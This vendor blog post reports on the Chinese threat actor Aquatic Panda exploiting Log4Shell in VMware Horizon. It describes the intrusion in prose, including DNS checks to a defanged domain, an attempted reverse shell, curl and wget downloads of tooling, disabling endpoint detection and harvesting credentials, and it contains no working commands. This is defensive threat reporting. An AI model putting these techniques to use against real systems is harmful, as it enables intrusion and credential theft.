WootCloud Blog

Chinese APT Hackers Exploiting Log4Shell and Lessons About Open Source Security

As we recently posted, the Log4J and Log4Shell and their ubiquitous usage in common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and more recently, VMware, specifically the VMware Horizon Tomcat web server, among others are all highly vulnerable to attacks.

Specifically, CrowdStrike Falcon researchers wrote the China-based threat actor called Aquatic Panda performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure.

This included a large undisclosed academic institution as targets.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.

The question to ask is how to manage thousands of contributors to thousands of OSS projects to manage to security standards needed to protect national and corporate security interests – Apache? Google? The Feds?

To learn more in a zero touch, no obligation Demo or POC, please contact us.

Share this post with your network.

Share on linkedin
LinkedIn
Share on twitter
Twitter
Share on facebook
Facebook
Contributing Authors:

Andreas Stenzel

Share this post with your network.

Share on linkedin
Share on twitter
Share on facebook

This website uses cookies to ensure you get the best experience on our website.